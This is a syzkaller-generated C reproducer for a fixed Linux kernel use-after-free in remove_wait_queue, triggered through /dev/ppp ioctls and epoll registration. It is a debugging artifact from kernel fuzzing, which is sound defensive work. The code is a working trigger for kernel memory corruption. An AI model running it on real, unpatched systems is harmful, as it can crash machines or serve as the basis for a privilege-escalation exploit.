| // KASAN: use-after-free Read in remove_wait_queue (2) |
| // https://syzkaller.appspot.com/bug?id=83bec290888c08680fb630ec3a2bc87d0ad4b73f |
| // status:fixed |
| // autogenerated by syzkaller (http://github.com/google/syzkaller) |
| |
| #define _GNU_SOURCE |
| #include <endian.h> |
| #include <stdint.h> |
| #include <string.h> |
| #include <sys/syscall.h> |
| #include <unistd.h> |
| |
| uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; |
| void loop() |
| { |
| long res; |
| syscall(__NR_unshare, 0x400); |
| memcpy((void*)0x20b31ff7, "/dev/ppp", 9); |
| res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20b31ff7, 0, 0); |
| if (res != -1) |
| r[0] = res; |
| syscall(__NR_ioctl, r[0], 0xc004743e, 0x20000100); |
| res = syscall(__NR_epoll_create, 0x1ffe); |
| if (res != -1) |
| r[1] = res; |
| *(uint32_t*)0x201b3073 = 0; |
| *(uint64_t*)0x201b3077 = 0; |
| syscall(__NR_epoll_ctl, r[1], 1, r[0], 0x201b3073); |
| syscall(__NR_ioctl, r[0], 0x4004743c, 0x20d1df52); |
| } |
| |
| int main() |
| { |
| syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); |
| loop(); |
| return 0; |
| } |
